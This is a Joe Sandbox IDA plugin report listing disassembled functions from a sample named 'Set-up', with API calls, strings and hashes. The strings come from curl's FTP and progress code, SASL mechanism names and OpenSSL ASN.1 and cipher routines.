Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1921080684
Opcode ID: fce6c098722690285d07e072540281a2713bdaa5a4e8dc8f56326b4c39de106d
Instruction ID: d7bb38510c280de1d74863d5b5161d26c9b8c5605344cd75f510e3f7c7c3347f
Opcode Fuzzy Hash: fce6c098722690285d07e072540281a2713bdaa5a4e8dc8f56326b4c39de106d
Instruction Fuzzy Hash: BF52D071A04308ABD724DB28DC85B7B7BE9FF94308F084869F985D7292E770D945C7A2

Function 0080E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0080E6F1

Strings

(nil), xrefs: 0080ECCD
-, xrefs: 0080EC74
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0080E68E, 0080E9AF, 0080EAF0
.%d, xrefs: 0080EE0E
0, xrefs: 0080EBCA
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0080E9AA, 0080EAEB

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: c29a08fd9f83a87f7d347c821b7704ee557bdf5f126d35c9037b4c97df3d17ae
Instruction ID: e31d0b1733c56e1de1deb779501a5ba822b62a617d77be626263c369bb3bd2ac
Opcode Fuzzy Hash: c29a08fd9f83a87f7d347c821b7704ee557bdf5f126d35c9037b4c97df3d17ae
Instruction Fuzzy Hash: 9C826B71A087419FD764CE29C88072BBBE1FF85324F148A6DF9A9D72D2D730D8458B92

Function 00886AA0 Relevance: 51.6, APIs: 8, Strings: 26, Instructions: 627COMMON

Download Yara Rule

APIs

memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,OAUTHBEARER,0000000B,0000000100000001,-00000007,FFFFFFFC,008628ED,-00000007,FFFFFFFC,?), ref: 00886C6D
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,SCRAM-SHA-1,0000000B,-00000007,FFFFFFFC,?), ref: 00886C85
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(008628ED,SCRAM-SHA-256,0000000D,?,?,?,-00000007,FFFFFFFC,?), ref: 00886CA6

Strings

-MD5, xrefs: 00886DF4
PLAI, xrefs: 00886AFC
RNAL, xrefs: 00886C20
DIGEST-MD5, xrefs: 00886BE5, 00886E0B
LOGI, xrefs: 00886B29
CRAM, xrefs: 00886BC7
EXTE, xrefs: 00886C19
GSSA, xrefs: 00886BFB
OAUTHBEARER, xrefs: 00886C67, 00886EB4
XOAU, xrefs: 00886C45
NTLM, xrefs: 00886E56
RNAL, xrefs: 00886E46
NTLM, xrefs: 00886AD4
GSSA, xrefs: 00886E21
UTH2, xrefs: 00886E9D
UTH2, xrefs: 00886C4C
NTLM, xrefs: 00886B67
-MD5, xrefs: 00886BCE
SCRAM-SHA-1, xrefs: 00886C7F, 00886ECC
CRAM, xrefs: 00886DED
LOGI, xrefs: 00886AEA
SCRAM-SHA-256, xrefs: 00886CA0, 00886EE9
NTLM, xrefs: 00886C30
PLAI, xrefs: 00886B3F
XOAU, xrefs: 00886E96
EXTE, xrefs: 00886E3F

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcmp
String ID: -MD5$-MD5$CRAM$CRAM$DIGEST-MD5$EXTE$EXTE$GSSA$GSSA$LOGI$LOGI$NTLM$NTLM$NTLM$NTLM$OAUTHBEARER$PLAI$PLAI$RNAL$RNAL$SCRAM-SHA-1$SCRAM-SHA-256$UTH2$UTH2$XOAU$XOAU
API String ID: 1475443563-2304668386
Opcode ID: 371f62beaa62ca9dc0f0432b9b34904ea994f7ba671decbc6cd703efd31a178b
Instruction ID: f198b0c53cc87abb7fdc3d6ca34ed287f81082ec4a6f63192e8ded0be7a33f75
Opcode Fuzzy Hash: 371f62beaa62ca9dc0f0432b9b34904ea994f7ba671decbc6cd703efd31a178b
Instruction Fuzzy Hash: 2202275920461543DE35252C88A07FA27E3EF433707794776E4BAC62F0F619C9ABAB13

Function 00814940 Relevance: 25.2, APIs: 1, Strings: 13, Instructions: 731COMMON

Download Yara Rule

APIs

Part of subcall function 0081D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,008101B1), ref: 0081D8E2

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 008152A5

Strings

--:-, xrefs: 00814F10
%2lld:%02lld:%02lld, xrefs: 00814DA4, 00814EEA, 00815047
-:--, xrefs: 00814F08
%3lldd %02lldh, xrefs: 00814E35, 00814F7F, 008150AB
-:--, xrefs: 00814DBE
Callback aborted, xrefs: 00814A7C
--:-, xrefs: 00814DC6
-:--, xrefs: 00814FC8
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00814AFC
%7lldd, xrefs: 00814E50, 00814F9A, 008150C3
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s, xrefs: 0081528E
--:-, xrefs: 00814FD0
** Resuming transfer from byte position %lld, xrefs: 00814AE9

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: CounterPerformanceQueryfflush
String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
API String ID: 1125614567-122532811
Opcode ID: d4f9350f7ef9ec516afc93e40b63cf69e7e5560a4db655bab018e354035f2698
Instruction ID: 3f820513658bf25db13e0507addc9510ba3bf59e302dd4845984be226545da79
Opcode Fuzzy Hash: d4f9350f7ef9ec516afc93e40b63cf69e7e5560a4db655bab018e354035f2698
Instruction Fuzzy Hash: E342E471B08700AFD7189E28CC91BABB6EAFFC4704F048A2DF55997291D775AC448B92

Function 00A90170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00A90374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00A90395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00A9049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00A904E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00A9055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00A9057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A90618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00A906E3

Strings

MD5, xrefs: 00A90194
SHA2-512, xrefs: 00A90BA5
SHA2-384, xrefs: 00A90B62
@, xrefs: 00A90B42
SHA1, xrefs: 00A901F7
SHA2-224, xrefs: 00A90238
SHA2-256, xrefs: 00A90B05

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: 78c3099fcd9ce29fe96d6f5d6230235e90eb91a3b40f1a46566e438b7b6d0cd4
Instruction ID: 5c94e5341515577d1ef352105d194faadd1f5adcdd2d023c1bb02dad0bf3fc2b
Opcode Fuzzy Hash: 78c3099fcd9ce29fe96d6f5d6230235e90eb91a3b40f1a46566e438b7b6d0cd4
Instruction Fuzzy Hash: D0529471A087818FDB11CF29C845BABB7E5AFD9384F044A2DF9C893252E774D944CB92

Function 009DE270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 009DE28D
FindNextFileW.KERNEL32(?,00000000), ref: 009DE2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 009DE30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 009DE3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 009DE3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 009DE3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 009DE41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 009DE44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 009DE563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 009DE571

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: f35cc3c33ec6da3c2a78718ec4f34917e73fa06c3978afa1ccb6fb3120014494
Instruction ID: 720084541452d3a39663b253d5c838a828062028605cd24c4ca3da066f3191f5
Opcode Fuzzy Hash: f35cc3c33ec6da3c2a78718ec4f34917e73fa06c3978afa1ccb6fb3120014494
Instruction Fuzzy Hash: 23913634240B429FD721AF34CC84B76BBA5EF85314F1886AAF9658F3A1E730E945CB50

Function 008BC900 Relevance: 18.4, APIs: 8, Strings: 4, Instructions: 368COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 008BCC95

Part of subcall function 008BCDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 008BCEC8
Part of subcall function 008BCDF0: SetLastError.KERNEL32(00000002,00000000,008BCC27,00000004), ref: 008BD109

SetLastError.KERNEL32(00000002), ref: 008BCDD0

Strings

:, xrefs: 008BC9B5
0123456789abcdef, xrefs: 008BCA03, 008BCA14, 008BCA9A, 008BCAAB
0123456789ABCDEF, xrefs: 008BCA29, 008BCA3E, 008BCAC3, 008BCAD4
0123456789, xrefs: 008BCC5E, 008BCC8E

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: ErrorLastmemchr
String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
API String ID: 2208448350-3285806060
Opcode ID: 912aa97e1d007162ace6e191cb029b6e5ad561df65ec7ecc12b75efd67ff29be
Instruction ID: 8926664eb7d8c13c83c55456a969ea1273150f95c63cd64724a05c1b0bbf0218
Opcode Fuzzy Hash: 912aa97e1d007162ace6e191cb029b6e5ad561df65ec7ecc12b75efd67ff29be
Instruction Fuzzy Hash: 9AD10676A083058BD7249E28D8913AFBBD1FF91354F18493DE8D9D7381EB709948D782

Function 009749F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON

Download Yara Rule

Strings

<ASN1 %d>, xrefs: 00974C67
%5ld:d=%-2d hl=%ld l=inf %s, xrefs: 00974B17
Error in encoding, xrefs: 00975392
%5ld:d=%-2d hl=%ld l=%4ld %s, xrefs: 00974B4D
priv [ %d ] , xrefs: 00974C3F
cont [ %d ], xrefs: 00974CC9
(unknown), xrefs: 00974E8D
cons: , xrefs: 00974B09, 00974B32, 00974B3F
appl [ %d ], xrefs: 00974CD1
length is greater than %ld, xrefs: 009753BA
BAD RECURSION DEPTH, xrefs: 00974A13
prim: , xrefs: 00974B37
%-18s, xrefs: 00974D01

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
API String ID: 0-2568808753
Opcode ID: e541f0e8e6a86d7a01136a9b8a3036d783cd950a2336a02445d1a85325fd51b7
Instruction ID: fffa0c908c7292d65353b10bfe1ce2e3148dd7b0c795e8a7e8bca0b6697a451e
Opcode Fuzzy Hash: e541f0e8e6a86d7a01136a9b8a3036d783cd950a2336a02445d1a85325fd51b7
Instruction Fuzzy Hash: 15E1B273608305EFD720AF54D841B6FB7E5AFC4744F05882CF98DA7292E7B5A9048B92

Function 0080A960 Relevance: 15.0, APIs: 3, Strings: 6, Instructions: 1493COMMON

Download Yara Rule

Strings

(nil), xrefs: 0080AF85
0, xrefs: 0080AEBE
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0080A9C6, 0080ACB4, 0080ADF6
-, xrefs: 0080AF2B
.%d, xrefs: 0080B1D2
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0080ACAF, 0080ADF1

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID:
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-2555271450
Opcode ID: 62dee92ce9122618026496bfd56b60587f2c01af873a31d11aab067225f442d4
Instruction ID: 224fb0383155c3c33107833df66b68b629c7ca0f4d9b81b6319ac109c12e590e
Opcode Fuzzy Hash: 62dee92ce9122618026496bfd56b60587f2c01af873a31d11aab067225f442d4
Instruction Fuzzy Hash: 32C269316083458FD758CE28C89076AB7E2FFD9364F158A2DE899DB391D730ED458B82

Function 00B70460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00B706A3

Strings

, xrefs: 00B716D8
, xrefs: 00B71813

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770937136.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770954730.0000000000CDF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770974186.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770990476.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771095630.0000000000E41000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771135773.0000000000E42000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1771152847.0000000000E46000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: 44deb2483392ea3240a2b573495a694ae3490894de3ab004d45ccbe08d4d7647
Instruction ID: 34edd6ecf65bfae36901452fd64a876c68e583125a7102743e85da0d7c479f9d
Opcode Fuzzy Hash: 44deb2483392ea3240a2b573495a694ae3490894de3ab004d45ccbe08d4d7647
Instruction Fuzzy Hash: 8AD2AF72A187158FC724DF2CC88026AF7E1EFC4304F198A6EE9A997351D770E945CB92

Function 00A487D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A48A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00A48A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00A48B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00A48B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00A48A42, 00A48F13

Memory Dump Source

Source File: 00000000.00000002.1770554454.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.1770534610.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000C9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770881763.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770921729.0000000000CDB000.00000008.00000001.01000000.00000003.sdmpDownload File
